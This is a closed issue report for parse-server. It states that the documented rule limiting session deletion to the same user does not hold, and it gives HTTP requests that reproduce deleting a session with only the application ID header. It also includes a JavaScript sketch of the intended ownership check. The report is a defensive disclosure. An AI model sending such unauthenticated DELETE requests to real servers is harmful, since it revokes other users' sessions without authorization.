Closed
Issue Description
It looks like the documentation here:
http://docs.parseplatform.org/rest/guide/#deleting-sessions
which says "You can only delete other sessions that belong to the same user.", is false. If a session objectId is leaked, it can be deleted with a request that carries only the X-Parse-Application-Id header.
Steps to reproduce
- Create an anonymous user with a request like this:

```http
POST /parse/users/ HTTP/1.1
Host: localhost:1337
Content-Type: application/json
X-Parse-Application-Id: myAppId
Cache-Control: no-cache

{
  "authData": {
    "anonymous": {
      "id": "8ba115f2-db2f-4de9-a976-e3cfd18d8be1"
    }
  }
}
```
- Note the sessionToken in the response
- Look up the session objectId with a request like this:

```http
GET /parse/sessions/me HTTP/1.1
Host: localhost:1337
X-Parse-Application-Id: myAppId
X-Parse-Session-Token: r:2e43f46b20a3c6420043d3299d7dcead
Content-Type: application/json
Cache-Control: no-cache
```
- Note the objectId
- Try to delete the session object with an unauthenticated request like this:

```http
DELETE /parse/sessions/VapNXYViLW HTTP/1.1
Host: localhost:1337
X-Parse-Application-Id: myAppId
Cache-Control: no-cache
```
Expected Results
You should have to prove you are a given user (with a session token) before you're allowed to delete sessions of that user.
Actual Outcome
The session is deleted
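As an added illustration (not parse-server's own code), the check below models the rule the REST guide states: a DELETE on `/parse/sessions/:objectId` is allowed only when the caller presents a valid session token for the same user that owns the target session. The store contents, user names and second token are constructed samples.

```javascript
// Added example, not parse-server's own code: models the authorization rule
// the REST guide describes for DELETE /parse/sessions/:objectId.
// Constructed in-memory session store: objectId -> session record.
function makeStore() {
  return {
    VapNXYViLW: { sessionToken: "r:2e43f46b20a3c6420043d3299d7dcead", user: "anon-1" },
    Kq72bYxPwe: { sessionToken: "r:0f5a1c9e8d7b6a5f4e3d2c1b0a9f8e7d", user: "user-2" },
  };
}

// Lower-case header names so lookups do not depend on client casing.
function normalize(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Decide whether the caller may delete `objectId`. The session token is
// verified before the target is looked up, so an unauthenticated caller
// learns nothing about whether a leaked objectId exists.
function authorizeSessionDelete(rawHeaders, objectId, store) {
  const h = normalize(rawHeaders);
  if (!h["x-parse-application-id"]) return { allowed: false, status: 403, reason: "missing app id" };
  const token = h["x-parse-session-token"];
  if (!token) return { allowed: false, status: 401, reason: "no session token" };
  const caller = Object.values(store).find((s) => s.sessionToken === token);
  if (!caller) return { allowed: false, status: 401, reason: "invalid session token" };
  const target = store[objectId];
  if (!target) return { allowed: false, status: 404, reason: "session not found" };
  if (target.user !== caller.user) return { allowed: false, status: 403, reason: "other user's session" };
  return { allowed: true, status: 200, reason: "same user" };
}

// Apply the decision: the record is removed only when the check passes.
function handleDeleteSession(rawHeaders, objectId, store) {
  const decision = authorizeSessionDelete(rawHeaders, objectId, store);
  if (decision.allowed) delete store[objectId];
  return decision;
}

// The report's third step: only X-Parse-Application-Id, no session token.
const demoStore = makeStore();
console.log(handleDeleteSession({ "X-Parse-Application-Id": "myAppId" }, "VapNXYViLW", demoStore));
// → { allowed: false, status: 401, reason: 'no session token' }
```

With the rule applied, the unauthenticated request is refused and the session record stays in the store; only the owning user's token removes it.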
Environment Setup
- Server
  - parse-server version: commit hash 9ad8697
  - Operating System: Windows
  - Localhost or remote server? localhost